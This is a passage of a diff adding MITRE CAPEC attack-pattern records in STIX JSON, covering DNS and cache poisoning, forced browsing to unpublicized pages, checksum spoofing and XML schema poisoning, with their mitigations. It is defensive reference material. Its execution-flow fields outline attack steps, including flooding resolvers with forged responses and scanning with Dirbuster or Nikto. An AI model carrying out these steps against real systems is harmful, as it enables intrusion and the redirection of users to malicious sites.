"course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93d45ad5-fae3-4178-8d28-ccd3ff20216c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1bb78a3-4a93-4fbe-815f-5cca85a0c491", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "id": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f20aff5-3638-4761-91c5-af43ae273927", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all buffer uses are consistently bounds-checked.", + "id": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4914cfc7-c995-469b-984b-72e07bf331e0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acdc688e-fa9d-48da-94ba-90902d7ac10d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.", + "external_references": [ + { + "external_id": "CAPEC-140", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + } + ], + "id": "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Bypassing of Intermediate Forms in Multiple-Form Sets", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.", + "external_references": [ + { + "external_id": "CAPEC-141", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/141.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Adversary-in-the-Middle: ARP Cache Poisoning", + "external_id": "T1557.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/002" + }, + { + "description": "Cache Poisoning", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cache_Poisoning" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-24", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/ARP_spoofing" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-599", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.html" + } + ], + "id": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify and explore caches: Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.

    2. Techniques
    Run tools that check available entries in the cache.

Experiment

  1. Cause specific data to be cached: An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.

    2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).

Exploit

  1. Redirect users to malicious website: As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.

    2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
    Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc" + ], + "x_capec_prerequisites": [ + "The attacker must be able to modify the value stored in a cache to match a desired value.", + "The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side caching.", + "id": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--deba223b-a821-4baf-b653-5358be0f03c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.", + "id": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f3dd06d-6976-4324-8d3c-1523b5d6f23a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.", + "external_references": [ + { + "external_id": "CAPEC-142", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/142.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "description": "Compromise Infrastructure: DNS Server", + "external_id": "T1584.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1584/002" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Vulnerability Note VU#800113, 2008--07---08, US CERT", + "external_id": "REF-27", + "source_name": "reference_from_CAPEC", + "url": "http://www.kb.cert.org/vuls/id/800113#pat" + } + ], + "id": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DNS Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore resolver caches: Check DNS caches on local DNS server and client's browser with DNS cache enabled.

    2. Techniques
    Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.
    Figure out if the client's browser has DNS cache enabled.

Experiment

  1. Attempt sending crafted records to DNS cache: A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.

    2. Techniques
    Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.
    If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction
    Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address.

Exploit

  1. Redirect users to malicious website: As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name.

    2. Techniques
    Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.
    Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions." + ], + "x_capec_resources_required": [ + "The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary's goals." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted DNS cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Make sure your DNS servers have been updated to the latest versions", + "id": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b310b70-cd48-479c-a4a6-1e9a513c96ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.", + "id": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d75a59b5-0380-4139-9922-641a68593944", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side DNS caching.", + "id": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3632005-d0b9-4ed4-b5c5-337170c60644", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.", + "external_references": [ + { + "external_id": "CAPEC-143", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/143.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web pages

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

    3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized pages
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public

    2. Techniques
    Manually analyze files or pages for information that could be useful in a further attack
    Use a static analysis tool to find weaknesses in unpublished web pages

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.", + "external_references": [ + { + "external_id": "CAPEC-144", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/144.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Services", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web services

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

    3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized web services
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public

    2. Techniques
    Use Nikto to look for web service vulnerabilities

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.", + "external_references": [ + { + "external_id": "CAPEC-145", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/145.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + } + ], + "id": "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Checksum Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.", + "The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.", + "The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack." + ], + "x_capec_resources_required": [ + "The adversary must have a utility that can intercept and modify messages between the sender and recipient." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.", + "external_references": [ + { + "external_id": "CAPEC-146", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Schema Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--41cfbb50-1b96-4004-a42e-6e8d21dd6f87" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:\n ]> John Smith 555-1234 jsmith@email.com
1 Example Lane
